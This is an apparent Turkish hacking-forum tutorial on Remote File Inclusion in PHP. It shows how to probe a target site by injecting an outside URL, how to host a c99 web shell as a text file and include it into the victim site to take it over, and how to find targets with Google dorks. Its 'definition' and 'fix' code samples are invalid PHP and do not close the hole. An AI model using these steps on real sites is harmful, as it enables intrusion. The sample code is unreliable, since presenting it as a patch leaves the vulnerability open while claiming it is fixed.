inci sözlük hacker team kuruldu
Bu makalemizde size rfı, açıklarının nasıl meydana geldiğini, uzaktan dosya çağırma işlemini, shell çağırma yöntemini rfı, açığını nasıl fixleyeceğimizi (kapatabileceğimizi) kodlarla ve örneklerle anlatmaya çalışacağım.
Bildiğiniz üzere (Remota File inclusion) uzaktan dosya çağırmak anldıbına gelmektedir.
1-RFI açığı nasıl oluşur
2-Tanımlama nasıl yapılır
3-RFI Açığı Tesbiti
4-Shell Dahil Etmek
5-Örnek RFI bug
6-Örnek RFI Fix
7-RFI Açıkları nasıl bulunur.
1-Rfı açığı nasıl oluşur?
RFI, web uyguklamalarındaki hatalı kodlamadan dolayı oluşur. Bir kodla örnek verecek olursak;
include (“$haberler/spor/sanat.php); buradaki dolar işaretinden dolayı uzaktan dosya çağırma mümkündür. Kodlama bu şekilde tanımlanmadan scripte dahil edilirse, kesinlikle uzaktan dosya çağırmaya Başka bir örnekle pekiştirelim.
include
include_once
require
require_once
Scripti kodlayan kişi tanımlamadan bu kodları scripte dahil ederse, uzaktan dosya çağırma işlemi mümkün olmuş, olur.
2-Tanımlama nasıl yapılır
include ("$haberler/spor/sanat.php"); Tanımlanmamış kod.
<?php
$haberler/spor/sanat.php =’tanımlı değer’
include ("$haberler/spor/sanat.php");
?>
Bu şekilde haberler, spor, sanat üçlüsünü tanımlamış olduk.
3-Rfı açığı tespiti
Hedef siteyi açtığınızda rfı açığı olup olmadığını anlamak için siteye hata verdirmeniz, gerekmektedir
Örneğin;
http://www.hedefsite.com/articles.php?id=10
http://www.hedefsite.com/...les.php?id=http://tht.net bu şekilde yönlendirmeye çalışıyoruz. Siz istediğiniz sayfaya yönlendirebilirsiniz. Şayet cw’nin anasayfası gelirse, bu sitede rfı açığı var demektir. Bazı rfı açıklarında ise sitenin kendi üzerinde hata vermektedir. Bu sitelerde de rfı arnılabilir. Evet açığı olduğunu düşündüğümüz shell çağırma işlemimizi deneyebiliriz.
4-Shell Dahil Etmek
Burada shell çağırırken yukarıda bahsetmiş olduğumuz yönlendirme işlemini gerçekleştireceğiz. Öncelikle kendi hotsunuza txt halinde shell yüklemeniz gerekiyor. Host adresiniz free olabilir. Örneğin; c99.txt şeklinde. Daha sonra uzaktan bu txt dosyasını yönlendirme işlemi ile hedef sitemize dahil edeceğiz.
http://www.hedefsite.com/articles.ph ... z.net/c99.txt?
Evet bu şekilde sitenize yüklediğiniz txt uzantılı shell’i hedef siteye yüklemiş olursunuz.
5-Örnek Rfı bug
Eğer scriptlerde rfı bug arıyorsanız, bunları iyi bilmeniz gerekmektedir. Örnek bir rfı bug yapalım.
<?php
$page = $_GET [page]; Rfı açığı burada page değerinde
include($page);
?>
6-Örnek RFI Fix
Scriptlerdeki bugları bu konuda verilmiş örnekleri baz alarak kapatabilirsiniz.
<?php
$page = $_GET"./"; Bu kodlamalar ile rfı açığımızı fixlemiş olduk.
include($page);
?>
7-RFI Açıkları nasıl bulunur
RFI, açıklarını mevcut dorklarla ve scannerlerle bulabilirsiniz.
Örnek Dorklar;
inurl:"com_sitemap"
inurl:"com_hashcash"
inurl:"com_colophon" vs..
Ayrıca hedef site üzerinde rfı açığından şüpheleniyorsanız, scannerlerle taratabilirsiniz. Ya da örneklerlede belirttiğimiz gibi manuel açık arayabilirsiniz. Tercihinize kalmış. Şimdilik dökümanımız bu kadar.
